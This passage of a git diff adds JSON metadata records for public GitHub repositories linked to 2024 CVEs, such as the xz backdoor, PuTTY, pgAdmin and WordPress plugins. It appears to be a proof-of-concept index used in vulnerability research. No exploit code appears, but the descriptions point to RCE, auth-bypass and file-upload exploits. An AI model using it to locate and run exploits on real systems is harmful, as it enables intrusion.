"DANO-AMP\/CVE-2024-3094", + "owner": { + "login": "DANO-AMP", + "id": 40738457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40738457?v=4", + "html_url": "https:\/\/github.com\/DANO-AMP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DANO-AMP\/CVE-2024-3094", + "description": "SSH EXPLOIT BYPASS AUTH SSH", + "fork": false, + "created_at": "2024-07-05T12:02:10Z", + "updated_at": "2024-08-06T14:09:40Z", + "pushed_at": "2024-07-05T12:03:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824707729, + "name": "ifuncd-up", + "full_name": "robertdfrench\/ifuncd-up", + "owner": { + "login": "robertdfrench", + "id": 18403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18403?v=4", + "html_url": "https:\/\/github.com\/robertdfrench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertdfrench\/ifuncd-up", + "description": "GNU IFUNC is the real culprit behind CVE-2024-3094", + "fork": false, + "created_at": "2024-07-05T18:36:16Z", + "updated_at": "2024-09-16T19:01:30Z", + "pushed_at": "2024-09-04T04:32:15Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3094", + "dynamic-linking", + "dynamic-loading", + "elf", + "glibc", + "global-offset-table", + "ifunc", + "memes", + "procedure-linkage-table", + "relro", + "ssh", + "supply-chain", + "systemd", + "xz-utils-backdoor" + ], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896714567, + "name": "cve-2024-3094-xz-backdoor-exploit", + "full_name": "XiaomingX\/cve-2024-3094-xz-backdoor-exploit", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-3094-xz-backdoor-exploit", + "description": "CVE-2024-3094 (XZ Backdoor) Tools", + "fork": false, + "created_at": "2024-12-01T05:22:08Z", + "updated_at": "2024-12-20T17:22:03Z", + "pushed_at": "2024-12-01T05:30:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30956.json b/2024/CVE-2024-30956.json new file mode 100644 index 0000000000..c63b729cae --- /dev/null +++ b/2024/CVE-2024-30956.json @@ -0,0 +1,33 @@ +[ + { + "id": 781338781, + "name": "CVE-2024-30956", + "full_name": "leoCottret\/CVE-2024-30956", + "owner": { + "login": "leoCottret", + "id": 71428793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71428793?v=4", + "html_url": "https:\/\/github.com\/leoCottret", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leoCottret\/CVE-2024-30956", + "description": "(DOM-based XSS) HTML Injection vulnerability in TOWeb v.12.05 and before allows an attacker to inject HTML\/JS code via the _message.html component.", + "fork": false, + "created_at": "2024-04-03T07:38:11Z", + "updated_at": "2024-06-24T11:19:11Z", + "pushed_at": "2024-06-24T11:19:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30973.json b/2024/CVE-2024-30973.json new file mode 100644 index 0000000000..134cc81199 --- /dev/null +++ b/2024/CVE-2024-30973.json @@ -0,0 +1,33 @@ +[ + { + "id": 791383768, + "name": "CVE-2024-30973", + "full_name": "Athos-Zago\/CVE-2024-30973", + "owner": { + "login": "Athos-Zago", + "id": 76454989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76454989?v=4", + "html_url": "https:\/\/github.com\/Athos-Zago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Athos-Zago\/CVE-2024-30973", + "description": " POC VIDEO - https:\/\/youtu.be\/hNzmkJj-ImM?si=NF0yoSL578rNy7wN", + "fork": false, + "created_at": "2024-04-24T16:10:22Z", + "updated_at": "2024-04-26T14:57:17Z", + "pushed_at": "2024-04-26T14:57:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30998.json b/2024/CVE-2024-30998.json new file mode 100644 index 0000000000..b84c8f5a66 --- /dev/null +++ b/2024/CVE-2024-30998.json @@ -0,0 +1,33 @@ +[ + { + "id": 779634369, + "name": "CVE-2024-30998", + "full_name": "efekaanakkar\/CVE-2024-30998", + "owner": { + "login": "efekaanakkar", + "id": 130908672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130908672?v=4", + "html_url": "https:\/\/github.com\/efekaanakkar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efekaanakkar\/CVE-2024-30998", + "description": null, + "fork": false, + "created_at": "2024-03-30T11:18:21Z", + "updated_at": "2024-05-25T22:56:19Z", + "pushed_at": "2024-05-25T22:56:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3105.json b/2024/CVE-2024-3105.json new file mode 100644 index 0000000000..539e462ec5 --- /dev/null +++ b/2024/CVE-2024-3105.json @@ -0,0 +1,41 @@ +[ + { + "id": 840743710, + "name": "CVE-2024-3105-PoC", + "full_name": "hunThubSpace\/CVE-2024-3105-PoC", + "owner": { + "login": "hunThubSpace", + "id": 49031710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49031710?v=4", + "html_url": "https:\/\/github.com\/hunThubSpace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunThubSpace\/CVE-2024-3105-PoC", + "description": "A PoC Exploit for CVE-2024-3105 - The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-08-10T14:52:44Z", + "updated_at": "2024-10-02T19:21:21Z", + "pushed_at": "2024-08-10T15:22:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve", + "cve-2024-3105", + "ethical-hacking", + "exploit", + "penetration-testing", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3116.json b/2024/CVE-2024-3116.json new file mode 100644 index 0000000000..c50bfcf649 --- /dev/null +++ b/2024/CVE-2024-3116.json @@ -0,0 +1,33 @@ +[ + { + "id": 783453075, + "name": "CVE-2024-3116_RCE_in_pgadmin_8.4", + "full_name": "TechieNeurons\/CVE-2024-3116_RCE_in_pgadmin_8.4", + "owner": { + "login": "TechieNeurons", + "id": 94286332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94286332?v=4", + "html_url": "https:\/\/github.com\/TechieNeurons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TechieNeurons\/CVE-2024-3116_RCE_in_pgadmin_8.4", + "description": "Making a lab and testing the CVE-2024-3116, a Remote Code Execution in pgadmin <=8.4", + "fork": false, + "created_at": "2024-04-07T23:03:55Z", + "updated_at": "2024-08-14T14:50:00Z", + "pushed_at": "2024-04-11T01:38:55Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31211.json b/2024/CVE-2024-31211.json new file mode 100644 index 0000000000..cf5e1a2c3a --- /dev/null +++ b/2024/CVE-2024-31211.json @@ -0,0 +1,33 @@ +[ + { + "id": 837708625, + "name": "-CVE-2024-31211", + "full_name": "Abdurahmon3236\/-CVE-2024-31211", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/-CVE-2024-31211", + "description": null, + "fork": false, + "created_at": "2024-08-03T19:26:55Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-03T19:29:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31317.json b/2024/CVE-2024-31317.json new file mode 100644 index 0000000000..2d0826922a --- /dev/null +++ b/2024/CVE-2024-31317.json @@ -0,0 +1,33 @@ +[ + { + "id": 898761841, + "name": "CVE-2024-31317", + "full_name": "fuhei\/CVE-2024-31317", + "owner": { + "login": "fuhei", + "id": 21951803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21951803?v=4", + "html_url": "https:\/\/github.com\/fuhei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuhei\/CVE-2024-31317", + "description": "CVE-2024-31317", + "fork": false, + "created_at": "2024-12-05T01:36:59Z", + "updated_at": "2025-01-04T07:07:09Z", + "pushed_at": "2024-12-05T01:52:45Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31319.json b/2024/CVE-2024-31319.json new file mode 100644 index 0000000000..88e94897d8 --- /dev/null +++ b/2024/CVE-2024-31319.json @@ -0,0 +1,33 @@ +[ + { + "id": 870013225, + "name": "fix-02-failure-CVE-2024-31319-CVE-2024-0039", + "full_name": "MssGmz99\/fix-02-failure-CVE-2024-31319-CVE-2024-0039", + "owner": { + "login": "MssGmz99", + "id": 184337003, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184337003?v=4", + "html_url": "https:\/\/github.com\/MssGmz99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MssGmz99\/fix-02-failure-CVE-2024-31319-CVE-2024-0039", + "description": null, + "fork": false, + "created_at": "2024-10-09T09:40:10Z", + "updated_at": "2024-10-09T09:40:10Z", + "pushed_at": "2024-08-23T09:34:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31351.json b/2024/CVE-2024-31351.json new file mode 100644 index 0000000000..4514edd999 --- /dev/null +++ b/2024/CVE-2024-31351.json @@ -0,0 +1,33 @@ +[ + { + "id": 805642345, + "name": "CVE-2024-31351_wordpress_exploit", + "full_name": "KTN1990\/CVE-2024-31351_wordpress_exploit", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-31351_wordpress_exploit", + "description": "Wordpress - Copymatic – AI Content Writer & Generator <= 1.6 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-05-25T04:02:23Z", + "updated_at": "2024-06-19T22:38:20Z", + "pushed_at": "2024-05-25T04:06:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31497.json b/2024/CVE-2024-31497.json new file mode 100644 index 0000000000..3b26f32a42 --- /dev/null +++ b/2024/CVE-2024-31497.json @@ -0,0 +1,103 @@ +[ + { + "id": 787723118, + "name": "CVE-2024-31497", + "full_name": "sh1k4ku\/CVE-2024-31497", + "owner": { + "login": "sh1k4ku", + "id": 74185433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74185433?v=4", + "html_url": "https:\/\/github.com\/sh1k4ku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sh1k4ku\/CVE-2024-31497", + "description": " A script designed to uncover vulnerabilities in Putty by exploiting CVE-2024-31497.", + "fork": false, + "created_at": "2024-04-17T04:00:20Z", + "updated_at": "2024-04-17T04:01:30Z", + "pushed_at": "2024-04-17T04:00:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787871319, + "name": "cve-2024-31497", + "full_name": "edutko\/cve-2024-31497", + "owner": { + "login": "edutko", + "id": 1013264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1013264?v=4", + "html_url": "https:\/\/github.com\/edutko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edutko\/cve-2024-31497", + "description": null, + "fork": false, + "created_at": "2024-04-17T10:43:42Z", + "updated_at": "2024-04-25T09:08:10Z", + "pushed_at": "2024-04-17T10:44:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798816693, + "name": "CVE-2024-31497-POC", + "full_name": "HugoBond\/CVE-2024-31497-POC", + "owner": { + "login": "HugoBond", + "id": 72299419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72299419?v=4", + "html_url": "https:\/\/github.com\/HugoBond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HugoBond\/CVE-2024-31497-POC", + "description": "Proof Of Concept that exploits PuTTy CVE-2024-31497.", + "fork": false, + "created_at": "2024-05-10T14:30:50Z", + "updated_at": "2024-06-18T18:14:02Z", + "pushed_at": "2024-05-11T13:33:17Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-31497", + "ecdsa", + "exploit", + "poc", + "putty", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31666.json b/2024/CVE-2024-31666.json new file mode 100644 index 0000000000..5e200ade69 --- /dev/null +++ b/2024/CVE-2024-31666.json @@ -0,0 +1,33 @@ +[ + { + "id": 779944558, + "name": "CVE-2024-31666", + "full_name": "hapa3\/CVE-2024-31666", + "owner": { + "login": "hapa3", + "id": 30132259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30132259?v=4", + "html_url": "https:\/\/github.com\/hapa3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hapa3\/CVE-2024-31666", + "description": null, + "fork": false, + "created_at": "2024-03-31T08:27:30Z", + "updated_at": "2024-09-12T10:36:48Z", + "pushed_at": "2024-09-12T10:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31719.json b/2024/CVE-2024-31719.json new file mode 100644 index 0000000000..7479560b8d --- /dev/null +++ b/2024/CVE-2024-31719.json @@ -0,0 +1,33 @@ +[ + { + "id": 672397199, + "name": "CVE-2024-31719----AMI-Aptio-5-Vulnerability", + "full_name": "VoltaireYoung\/CVE-2024-31719----AMI-Aptio-5-Vulnerability", + "owner": { + "login": "VoltaireYoung", + "id": 44109336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44109336?v=4", + "html_url": "https:\/\/github.com\/VoltaireYoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoltaireYoung\/CVE-2024-31719----AMI-Aptio-5-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-07-30T00:07:14Z", + "updated_at": "2024-09-10T07:11:45Z", + "pushed_at": "2024-09-10T07:11:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3177.json b/2024/CVE-2024-3177.json new file mode 100644 index 0000000000..0dd85e55c8 --- /dev/null +++ b/2024/CVE-2024-3177.json @@ -0,0 +1,33 @@ +[ + { + "id": 852879948, + "name": "Metasploit-Module-TFM", + "full_name": "Cgv-Dev\/Metasploit-Module-TFM", + "owner": { + "login": "Cgv-Dev", + "id": 128702955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128702955?v=4", + "html_url": "https:\/\/github.com\/Cgv-Dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cgv-Dev\/Metasploit-Module-TFM", + "description": "Module written in Ruby with the objective of exploiting vulnerabilities CVE-2023-2728 and CVE-2024-3177, both related to the secret mount policy in a Kubernetes cluster using a custom Metasploit module. Part of a Cybersecurity Master's degree finalization project.", + "fork": false, + "created_at": "2024-09-05T15:30:51Z", + "updated_at": "2024-09-05T17:44:53Z", + "pushed_at": "2024-09-05T17:44:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31771.json b/2024/CVE-2024-31771.json new file mode 100644 index 0000000000..c12987e0ab --- /dev/null +++ b/2024/CVE-2024-31771.json @@ -0,0 +1,33 @@ +[ + { + "id": 784845906, + "name": "CVE-2024-31771", + "full_name": "restdone\/CVE-2024-31771", + "owner": { + "login": "restdone", + "id": 42227817, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42227817?v=4", + "html_url": "https:\/\/github.com\/restdone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/restdone\/CVE-2024-31771", + "description": null, + "fork": false, + "created_at": "2024-04-10T17:09:34Z", + "updated_at": "2024-05-12T23:00:33Z", + "pushed_at": "2024-05-12T19:59:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31777.json b/2024/CVE-2024-31777.json new file mode 100644 index 0000000000..66db5919cf --- /dev/null +++ b/2024/CVE-2024-31777.json @@ -0,0 +1,33 @@ +[ + { + "id": 785244056, + "name": "Exploit-CVE-2024-31777", + "full_name": "FreySolarEye\/Exploit-CVE-2024-31777", + "owner": { + "login": "FreySolarEye", + "id": 44547688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44547688?v=4", + "html_url": "https:\/\/github.com\/FreySolarEye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FreySolarEye\/Exploit-CVE-2024-31777", + "description": "Public exploit for CVE-2024-31777", + "fork": false, + "created_at": "2024-04-11T13:48:19Z", + "updated_at": "2024-09-08T16:18:00Z", + "pushed_at": "2024-09-08T16:17:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31819.json b/2024/CVE-2024-31819.json new file mode 100644 index 0000000000..ed6130fd31 --- /dev/null +++ b/2024/CVE-2024-31819.json @@ -0,0 +1,64 @@ +[ + { + "id": 778341084, + "name": "CVE-2024-31819", + "full_name": "Chocapikk\/CVE-2024-31819", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-31819", + "description": "Unauthenticated Remote Code Execution (RCE) Vulnerability in WWBNIndex Plugin of AVideo Platform from 12.4 to 14.2", + "fork": false, + "created_at": "2024-03-27T14:41:10Z", + "updated_at": "2024-09-06T10:30:02Z", + "pushed_at": "2024-04-11T20:51:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 812561319, + "name": "CVE-2024-31819", + "full_name": "dream434\/CVE-2024-31819", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-31819", + "description": "An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.", + "fork": false, + "created_at": "2024-06-09T08:48:21Z", + "updated_at": "2024-10-09T13:48:07Z", + "pushed_at": "2024-10-09T13:48:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3183.json b/2024/CVE-2024-3183.json new file mode 100644 index 0000000000..596625993b --- /dev/null +++ b/2024/CVE-2024-3183.json @@ -0,0 +1,33 @@ +[ + { + "id": 842524366, + "name": "CVE-2024-3183-POC", + "full_name": "Cyxow\/CVE-2024-3183-POC", + "owner": { + "login": "Cyxow", + "id": 31488526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31488526?v=4", + "html_url": "https:\/\/github.com\/Cyxow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyxow\/CVE-2024-3183-POC", + "description": "POC for CVE-2024-3183 (FreeIPA Rosting)", + "fork": false, + "created_at": "2024-08-14T14:24:58Z", + "updated_at": "2024-09-20T07:07:05Z", + "pushed_at": "2024-08-20T14:16:04Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31835.json b/2024/CVE-2024-31835.json new file mode 100644 index 0000000000..7137d77824 --- /dev/null +++ b/2024/CVE-2024-31835.json @@ -0,0 +1,33 @@ +[ + { + "id": 864144112, + "name": "CVE-2024-31835", + "full_name": "paragbagul111\/CVE-2024-31835", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-31835", + "description": "Cross Site Scripting vulnerability in flatpress CMS Flatpress v1.3 allows a remote attacker to execute arbitrary code via a craftedpayload to the file name parameter.", + "fork": false, + "created_at": "2024-09-27T15:17:10Z", + "updated_at": "2024-09-27T15:38:41Z", + "pushed_at": "2024-09-27T15:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31848.json b/2024/CVE-2024-31848.json new file mode 100644 index 0000000000..926dffbbd6 --- /dev/null +++ b/2024/CVE-2024-31848.json @@ -0,0 +1,43 @@ +[ + { + "id": 797175885, + "name": "CVE-2024-31848-PoC", + "full_name": "Stuub\/CVE-2024-31848-PoC", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-31848-PoC", + "description": "PoC for Exploiting CVE-2024-31848\/49\/50\/51 - File Path Traversal ", + "fork": false, + "created_at": "2024-05-07T10:42:03Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-07T17:54:28Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cdata", + "cve-2024-31848", + "cve-2024-31849", + "cve-2024-31850", + "cve-2024-31851", + "jetty", + "poc", + "threat", + "threat-intel" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31974.json b/2024/CVE-2024-31974.json new file mode 100644 index 0000000000..fdd9a27299 --- /dev/null +++ b/2024/CVE-2024-31974.json @@ -0,0 +1,33 @@ +[ + { + "id": 801830634, + "name": "com.solarized.firedown", + "full_name": "actuator\/com.solarized.firedown", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.solarized.firedown", + "description": "CVE-2024-31974", + "fork": false, + "created_at": "2024-05-17T02:02:00Z", + "updated_at": "2024-05-17T02:14:05Z", + "pushed_at": "2024-05-17T02:10:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31982.json b/2024/CVE-2024-31982.json new file mode 100644 index 0000000000..495665d8e8 --- /dev/null +++ b/2024/CVE-2024-31982.json @@ -0,0 +1,95 @@ +[ + { + "id": 818584647, + "name": "CVE-2024-31982", + "full_name": "k3lpi3b4nsh33\/CVE-2024-31982", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-31982", + "description": null, + "fork": false, + "created_at": "2024-06-22T08:47:20Z", + "updated_at": "2024-06-24T06:47:27Z", + "pushed_at": "2024-06-22T08:50:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818721820, + "name": "CVE-2024-31982", + "full_name": "th3gokul\/CVE-2024-31982", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-31982", + "description": "A tool for vulnerability detection and exploitation tool for CVE-2024-31982 ", + "fork": false, + "created_at": "2024-06-22T17:04:02Z", + "updated_at": "2024-07-10T13:48:18Z", + "pushed_at": "2024-06-22T19:31:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, 